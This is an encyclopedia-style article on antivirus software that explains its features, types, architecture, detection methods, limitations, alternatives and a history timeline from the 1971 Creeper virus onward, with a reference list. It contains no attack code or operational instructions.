Antivirus Software

Discussion

• What are the features of an antivirus software?

  Below are some common features of an antivirus software:

  • Real-time scanning: Antivirus software that do security checks while using the system are real-time scanning software.
  • Quarantine: An isolated place where harmful files are kept.
  • Bank mode: A feature that provides a clean and safe virtual environment within the real desktop environment.
  • Ransomware Shield: Secures personal photos, documents, and other files from being modified, deleted, or encrypted by ransomware attacks.
  • Remote Access Shield: Protects the computer from remote and unauthorized access.
  • Sandbox: A sandbox is a system in which suspicious files are tested and analysed inside a virtual machine to detect malware.
  • Hack alerts: Warns if sensitive data is leaked on the Dark Web and other online sources.
  • Password protection: Protects passwords stored in web browsers.
  • Webcam shield: Restricts applications and malware from gaining unauthorized access to the webcam.
  • Masking IP address: Hide the IP address while browsing internet.
  • Freemium vs Paid versions: Basic features with free versions. More features with paid versions.
• What are the types of antivirus programs?

  Standalone antivirus software are specialized to scan and remove certain viruses. They can easily be carried from one place to another in a USB drive. These type of antivirus programs do not provide real-time protection. Windows defender offline, Metascan client and Microsoft scanner are some examples.

  Security software suites provide more security features than antivirus software. They not only scan and remove the viruses but also protect from other malicious attacks. They provide complete protection to the user's computer. They include extra security features such as anti-spyware, firewall, site authentication and parental controls. Bitdefender Total Security, Norton 360 Deluxe, and Kaspersky Total Security are some of its examples.

  Cloud-based antivirus software analyse the files on the cloud instead of on the user systems. They have two parts: (a) client side that's installed on user systems; (b) cloud side that captures the data gathered from client side and runs the scans. The latter saves a lot of memory and resources on user computers.

• What's the architecture of antivirus software?

  

  Architecture of signature-based antivirus. Source: Madhavi 2022.

  An antivirus software consists of four main components namely Anti-virus Manager, Anti-virus Engine, Malware Signature Database and Anti-virus Driver.

  The Anti-virus Manager handles overall management functions. It's responsible for executing malware scans, reviewing the results of malware restoration, raising alarms, and setting a periodic scan policy for malware. It updates the Malware Signature DB and the Anti-virus Engine.

  The Anti-virus Engine is responsible for handling malware in the system. It analyses the file information and marks it safe or harmful based on the scanning.

  In the Malware Signature Database, signatures of malware are kept. The antivirus engine evaluates the suspicious file by comparing its characteristics to these signatures.

  The Anti-virus Driver is a real-time malware entry monitoring function that revokes access to malware-infected user files. It checks the input and output of the file and determines the exact file path to check for malware.

• Which are major virus detection methods used by antivirus software?

  There are mainly two virus detection techniques used by antivirus programs namely Heuristic-based detection and Signature-based detection.

  In signature-based detection, the antivirus software scans the files and compares it with the predefined malicious code present in its database. The signature could include malicious network attack behaviour, content of email subject lines, file hashes, known byte sequences or malicious domains. If a file matches any malicious code, it flags it as virus and takes necessary actions. The antivirus can't detect any new malware or even any updated variant of malware that is not written in definition file. With rapid growth in variants of malware, this detection method becomes ineffective in long run.

  In heuristic-based detection the antivirus software uses data mining and machine learning techniques to learn the behaviour of an executable file. For instance, it may detect commands to deliver payloads disguised within a Trojan horse virus or those used to distribute a worm virus. It's able to identify new or altered variants of malware even in the absence of updated malware code in the database. It's commonly used in combination with signature-based detection.

• What are other virus detection techniques used by antivirus software?

  Behavioural-based detection analyses every single line of code in the file before its execution. If it finds the objective of the file suspicious or harmful (such as taking access to any critical or irrelevant files, processes, or internal services) it flags it as malware. Degree of potential danger is calculated by the antivirus software and required actions are taken afterwards. Some examples of malicious behaviours include any attempt to discover a sandbox environment, disabling security controls, installing rootkits, and registering for autostart.

  Sandbox is a system for malware detection that runs any suspicious object in a virtual machine (VM). If the object performs malicious actions in VM, the sandbox registers it as malware. VMs are isolated from the real system.

  Cloud-based detection identifies malware by collecting data from host computers and analysing it on the provider's infrastructure, instead of performing the analysis locally on the system. It's done by capturing relevant details about the file and the context of its execution and providing them to the cloud engine for processing.

• What are the differences between server, desktop and mobile antivirus software?

  Most antivirus software are built for desktops, specially Windows as it has the largest user base. Many antivirus software vendors offer their product at different price ranges, starting with free version which offer only basic protection. These free versions often don't protect against malicious attachments in emails, fishy website links and other type of cyber attacks. Microsoft offers a basic free antivirus software with Windows known as Windows Defender.

  Mobile antivirus software differ than the desktop ones as they have less access and control over the host device. Mobile antivirus software can't do OS file access, website filtering, in-memory scans or real-time protection engines. Android users need antivirus software more than the iOS users as iOS devices have better security features.

  A good server antivirus software detects virus before it infects the system. It also stops data transfer between server and external drives. It defends information on servers from every kind of malicious applications. It provides security for different server subsystems such as email, firewall and proxy.

• What are the challenges faced with an antivirus software?

  One of the biggest challenges faced with antivirus software is that it slows down the computer. Antivirus software loads each time when the system boots up which makes booting slower. Without a powerful processor and a good amount of memory, antivirus software can slow down systems to a high extent.

  No antivirus software provide 100% security from all kinds of cyber threats. Inexperienced users might fall into a false assumption of being completely secure. If the antivirus uses heuristic detection, it might flag harmless websites and software as malicious.

  Antivirus software runs at the kernel level of the operating system. It has privileged access to all the core files of the OS and system. Hence it becomes a potential target for cyber attacks. The US National Security Agency (NSA) and the UK Government Communications Headquarters (GCHQ) intelligence agencies have been exploiting anti-virus software to spy on users. In fact, it's been noted that popular software such as Acrobat Reader, Microsoft Word or Google Chrome are harder to exploit than 90% of the anti-virus products.

• Are there any alternatives of antivirus software?

  

  The command-line rkhunter scanner, an engine to scan for Linux rootkits running on Ubuntu. Source: Nanni 2020.

  Below are some alternatives of antivirus software:

  • Network firewall: Network firewalls stop unknown programs and processes from accessing the system but unlike antivirus programs, they don't identify or remove any virus present in the system. They provide safety from malware coming from other websites on a network.
  • Cloud antivirus: Cloud antivirus offer features like other antivirus programs but rely on cloud to process malware. They're faster than usual antivirus software as it does most of its computing on the cloud. Due to up-to-date database of malware and viruses they can find new versions of malware. Panda Cloud Antivirus and Immunet are examples of cloud antivirus.
  • Online scanning: Some antivirus vendors provide websites that offer free scanning of system. These can be used without downloading heavy software in local systems.
  • Specialized tools: Virus removal tools are helpful in removing stubborn/sticky viruses. Avast Free Anti-Malware, AVG Free Malware Removal Tools and Avira AntiVir Removal Tool are some examples of such tools.

Milestones

1971

The first known virus named as Creeper Virus is discovered. It infects DEC PDP-10 mainframe computers running the TENEX operating system. Ray Tomlinson writes a program to delete creeper virus. This program is known as The Reaper. Some people consider the Reaper as the first antivirus program but Reaper is itself a virus made to remove the Creeper Virus.

1987

Bernd Fix becomes the innovator of first antivirus product. However, there are competing claims for it. John McAfee establishes the McAfee company. Peter Paško, Rudolf Hrubý, and Miroslav Trnka create the first version of NOD antivirus. The first two heuristic antivirus utilities are released: Flushot Plus by Ross Greenberg and Anti4us by Erwin Lanting.

2000

Rainer Link and Howard Fuhs start the first open-source antivirus engine called OpenAntivirus Project.

2001

Graphical front-end of ClamTk Antivirus. Source: Linux Mint 2022.

Tomasz Kojm releases the first version of ClamAV, the first ever open-source antivirus engine to be commercialised.

2005

AV-TEST (a German based independent organization) reports that there are 333,425 unique malware samples in their database. In 2007 alone, AV-TEST reports 5,490,960 new unique malware samples.

2008

McAfee Labs adds the industry-first cloud-based anti-malware functionality to VirusScan (an antivirus) under the name Artemis.

2010

A faulty update on the AVG anti-virus suite damages 64-bit versions of Windows 7, rendering it unable to boot, due to an endless boot loop created. If not properly managed, this highlights the danger of antivirus programs since they have privileged access.

2011

Microsoft Security Essentials (MSE) removes the Google Chrome web browser, rival to Microsoft's own Internet Explorer. MSE flags Chrome as a Zbot banking trojan. In 2017, Google Play Protect on Moto G4 flags a Bluetooth system app as malware, causing Bluetooth functionality to become disabled for all apps. In 2022, Microsoft Defender flags all Chromium-based web browsers and Electron-based apps (Whatsapp, Discord, Spotify) as a severe threat. There are some examples of false positives.

References

1. AVG. 2022. "Remote Access Shield." AVG. Accessed 2022-12-20.
2. Avast. 2022. "Quarantine - Getting Started." Avast. Updated 2022-06-02. Accessed 2022-12-20.
3. Avast. 2022b. "Avast Secure Browser Bank Mode - Getting Started." Avast. Updated 2022-06-02. Accessed 2022-12-20.
4. Avast. 2022c. "Password Protection - Getting Started." Updated 2022-06-02. Accessed 2022-12-20.
5. Avast. 2022d. "Webcam Shield - FAQs." Avast. Updated 2022-06-02. Accessed 2022-12-20.
6. Avast Business. 2022. "Ransomware Shield." Avast Business. Accessed 2022-12-20.
7. Avast Business. 2022b. "Hack Alerts for Android." Avast Business. Accessed 2022-12-20.
8. Bazrafshan, Z., H. Hashemi, S. M. H. Fard and A. Hamzeh. 2013. "A survey on heuristic malware detection techniques." The 5th Conference on Information and Knowledge Technology, pp. 113-120, May 28-30. doi: 10.1109/IKT.2013.6620049. Accessed 2022-12-20.
9. Beehler, Eric. 2014. "How mobile antivirus software works and how to know if you need it." TechTarget, March 10. Accessed 2022-12-12.
10. Belcic, Ivan. 2020. "How do I Hide My IP Address?" Avast, April 08. Updated 2022-10-26. Accessed 2022-12-20.
11. Belfast Telegraph. 2015. "NSA and GCHQ attacked antivirus software so that they could spy on people, leaks indicate." Belfast Telegraph, June 24. Updated 2022-11-30. Accessed 2022-12-12.
12. Center for Internet Security. 2022. "Election Security Spotlight – Signature-Based vs Anomaly-Based Detection." Center for Internet Security. Accessed 2022-12-20.
13. Clementi, Andreas. 2008. "McAfee Artemis." Technology Preview Report, AV-Comparatives, February. Updated 2008-06-03. Accessed 2022-12-19.
14. Cloonan, John. 2017. "Advanced Malware Detection - Signatures vs. Behavior Analysis." Infosecurity Magazine, April 11. Accessed 2022-12-20.
15. Comodo Security Solutions. 2022. "How Antivirus Works?" Comodo Security Solutions. Accessed 2022-12-11.
16. Constantin, Lucian. 2011. "MSE false positive detection forces Google to update Chrome." The Inquirer, October 03. Accessed 2022-12-14.
17. Das, Ankush. 2022. "What Is Cloud Antivirus and Should You Use It?" MakeUseOf, April 19. Accessed 2022-12-12.
18. DotNek. 2021. "What is antivirus and its types?" DotNek Software & Mobile Application Development, April 21. Updated 2021-12-14. Accessed 2022-11-29.
19. Fishman, Andrew, and Marquis-Boire. 2015. "Popular security software came under relentless NSA and GCHQ attacks." The Intercept, June 22. Accessed 2022-12-12.
20. Fortinet. 2022. "Heuristic Analysis Definition." Accessed 2022-12-20.
21. FreeWimaxInfo. 2022. "What are Anti-Virus Servers." FreeWimaxInfo. Accessed 2022-12-17.
22. Gupta, Harish. 2022. "Anti virus." Lecture notes, Govt. Polytechnic Panchkula. Accessed 2022-12-11.
23. Han, S.-H., H.-K. Lee, G.-Y. Gim, and S.-J. Kim. 2020. "Empirical Study on Anti-Virus Architecture for Container Platforms." IEEE Access, vol. 8, pp. 134940-134949. doi: 10.1109/ACCESS.2020.3005591. Accessed 2022-12-20.
24. Kaspersky. 2022. "Sandbox." Kaspersky. Accessed 2022-12-20.
25. Leyden, John. 2010. "Horror AVG update ballsup bricks Windows 7." The Register, December 02. Accessed 2022-12-25.
26. Linux Mint. 2022. "ClamTK." Linux Mint. Accessed 2022-12-19.
27. Madhavi. 2022. "How Antivirus works." Engineers Garage. Accessed 2022-12-25.
28. Martin, Bob. 2016. "5 Must-Have Features of Antivirus Software." Blog, Great Lakes Computer Corporation, July 21. Accessed 2022-11-29.
29. McDade, Mirren. 2022. "Top 5 Key Features Of Antivirus Solutions For SMBs." Expert Insights. Updated 2022-01-26. Accessed 2022-11-29.
30. McGuire, Cecilia. 2014. "Malware and Anti-Virus Architecture." eForensics Magazine, September 04. Accessed 2022-12-11.
31. Moes, Tibor. 2022. "What is Antivirus Software? The 3 Types You Need to Know." SoftwareLab.org, Momento Ventures Inc. Accessed 2022-11-29.
32. Nanni, Dan. 2020. "How to scan Linux for rootkits with rkhunter." Xmodulo. Updated 2020-09-24. Accessed 2022-12-19.
33. National Cyber Security Centre. 2019. "What is an antivirus product? Do I need one?" National Cyber Security Centre, January 21. Accessed 2022-12-11.
34. Rosencrance, Linda. 2017. "antivirus software (antivirus program)." TechTarget, August 28. Accessed 2022-12-11.
35. Rubino, Daniel. 2022. "Windows Defender is reporting a false-positive threat 'Behavior:Win32/Hive.ZY'; it's nothing to be worried about." Windows Central, September 05. Accessed 2022-12-14.
36. Scrivens, Scott. 2017. "If Google Play Protect is breaking bluetooth on your Moto G4 Plus, don't worry because there's a fix." Android Police, September 11. Accessed 2022-12-14.
37. Sharma, Umakant. 2014. "What is the Importance of Antivirus for Server?" LinkedIn, July 01. Accessed 2022-12-12.
38. Standard Office Systems. 2020. "How does antivirus work?" Blog, SOS Can Help!, Standard Office Systems, January 09. Accessed 2022-12-11.
39. Sujith. 2013. "A Brief History of Antivirus Software." TechLineInfo, October 13. Accessed 2022-12-14.
40. Support.com. 2010. "How Antivirus Software Can Slow Down Your Computer." Support.com, July 26. Updated 2022-11-30. Accessed 2022-12-12.
41. Taylor, Twain. 2019. "Behavior-based security vs. signature-based security: How they differ." Tech Genix, November 26. Accessed 2022-12-20.
42. The Virus Encyclopedia. 2022. "Creeper." The Virus Encyclopedia. Accessed 2022-12-19.
43. Tyagi, Iti. 2012. "Architecture and working of an Antivirus Engine." India study channel, May 05. Accessed 2012-05-05.
44. Wikipedia. 2022. "Antivirus software." Wikipedia, November 30. Accessed 2022-12-12.
45. Zelster, Lenny. 2016. "How Antivirus Software Works: 4 Detection Techniques." Updated 2016-02-10. Accessed 2022-12-20.

Further Reading

1. Gupta, Harish. 2022. "Anti virus." Lecture notes, Govt. Polytechnic Panchkula. Accessed 2022-12-11.
2. Tyagi, Iti. 2012. "Architecture and working of an Antivirus Engine." India study channel, May 05. Accessed 2012-05-05.
3. Standard Office Systems. 2020. "How does antivirus work?" Blog, SOS Can Help!, Standard Office Systems, January 09. Accessed 2022-12-11.
4. Beehler, Eric. 2014. "How mobile antivirus software works and how to know if you need it." TechTarget, March 10. Accessed 2022-12-12.
5. Wikipedia. 2022. "Antivirus software." Wikipedia, November 30. Accessed 2022-12-12.

Article Stats

Author-wise Stats for Article Edits

Author

No. of Edits

No. of Chats

DevCoins

Govindpathak

6

9

2024

arvindpdmn

2

6

653

DevCoins due to articles, chats, their likes and article hits are included.

Cite As